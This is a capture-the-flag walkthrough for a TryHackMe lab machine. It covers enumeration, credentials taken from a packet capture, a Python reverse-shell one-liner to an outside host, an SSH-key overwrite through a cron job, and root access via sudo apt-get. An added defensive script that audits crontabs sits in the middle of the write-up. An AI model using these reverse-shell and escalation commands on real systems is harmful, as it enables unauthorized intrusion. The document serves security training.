Simple walkthrough of how I completed the “Smag Grotto” room on tryhackme.com
Enumeration
Running an Nmap scan with version detection and the default scripts (-sC -sV) showed two open ports: 22 (SSH) and 80 (HTTP).
nmap -sC -sV 10.10.172.176
Website
Checking out the website doesn’t initially give us much to go on
There's also nothing hiding in the page source, so it's time to use Gobuster to search for additional directories
Running Gobuster revealed one additional directory to look at: /mail
gobuster dir -u 10.10.172.176 -w /usr/share/wordlists/dirb/common.txt
Viewing /mail shows a .pcap file that we can download; however, we must download it with wget because of a bug in the email2web software
Wireshark
Opening the .pcap file in Wireshark gives us some login credentials and also a login page that appears to be on a subdomain. So we will have to add this subdomain to our hosts file
Initial Foothold
Accessing the newly acquired login page and using the credentials we are presented with a page that allows us to input commands
Commands can be entered, but they return no output, so we can't use this to learn about the system directly; however, we can try to catch a reverse shell
Set up a netcat listener
nc -lvnp <port>
I found that a python3 reverse shell worked for me but others may also work
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Success! We were able to gain a reverse shell
User Escalation
Great, we were able to get a shell as the www-data user, but this user usually doesn't have many privileges, so we need to find a way to access another user. After looking around the machine for a short while I decided to check the crontab, which is a time-based job scheduler
It looks like there is something we could exploit
This cron job reads the contents of the file “jake_id_rsa.pub.backup” and overwrites Jake's SSH authorized public key with it. If we generate our own key pair and replace that file with our own public key, we can log in over SSH as Jake
Use this command to generate a pair of SSH keys and copy the id_rsa.pub key
ssh-keygen
Overwrite the “jake_id_rsa.pub.backup” file with your own public key
echo "<PUBLIC KEY>" > jake_id_rsa.pub.backup
After a minute the cronjob will run and Jake's SSH key will have been overwritten with our own, allowing us to use our created private key to log in
We successfully gained access to the user Jake and can get our first flag, the user flag!
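From the defender's side, the root cause here is a cron job that installs an SSH key from a file any local user can overwrite. The following Python script is an added example (not part of the room or this write-up) that audits crontab text for that pattern; the crontab lines and file paths it builds are constructed, and the regexes only cover the cat-and-redirect form seen in this room.

```python
"""Audit cron entries for the weakness used in this room: a job that copies a
file which unprivileged users can write into someone's SSH authorized_keys.
Added example, not part of the room; crontab text and paths are constructed."""
import os
import re
import stat
import tempfile

DEST_RE = re.compile(r">\s*(\S*authorized_keys)\b")  # redirect into authorized_keys
SRC_RE = re.compile(r"\bcat\s+(\S+)")               # file read by cat or /bin/cat


def writable_by_others(path):
    """True if group or world can write the file, or if it is missing
    (then whoever can create it controls the key that gets installed)."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return True
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_crontab(crontab_text):
    """Return (source, destination) for each entry installing a key from a tamperable file."""
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        src, dest = SRC_RE.search(line), DEST_RE.search(line)
        if src and dest and writable_by_others(src.group(1)):
            findings.append((src.group(1), dest.group(1)))
    return findings


def _write(path, text, mode):
    with open(path, "w") as fh:
        fh.write(text)
    os.chmod(path, mode)  # set the bits explicitly so umask does not interfere
    return path


def demo():
    """Constructed crontab: the room's world-writable backup key plus a 0644 one."""
    tmp = tempfile.mkdtemp()
    bad = _write(os.path.join(tmp, "jake_id_rsa.pub.backup"), "ssh-ed25519 AAAA... jake\n", 0o666)
    good = _write(os.path.join(tmp, "admin_id.pub"), "ssh-ed25519 AAAA... admin\n", 0o644)
    crontab = (
        "* * * * * root /bin/cat %s > /home/jake/.ssh/authorized_keys\n"
        "* * * * * root /bin/cat %s > /home/admin/.ssh/authorized_keys\n" % (bad, good)
    )
    return audit_crontab(crontab)  # only the jake entry is reported
```

Call demo() to see the flagged entry; to audit a real host, feed the contents of /etc/crontab and /etc/cron.d/* to audit_crontab instead.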
Root Escalation
Whenever I first gain access to a system as a user, the first thing I check is whether I can run any commands with sudo, which happens to be the privilege escalation method I used to gain root access
sudo -l
The user Jake is allowed to run the command apt-get with sudo without entering a password
Checking the website GTFOBins, which lists ways of escalating privilege through misconfigured Unix binaries, gives us 3 different ways to turn sudo apt-get into a root shell
I used this one, which executes a command after the update finishes; that command is a shell here, and since apt-get is running as root, the shell it spawns is a root shell
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
As you can see this has given us a root shell
Time to get the root flag
And that’s this room completed!
Overall this room was fun and easy to complete!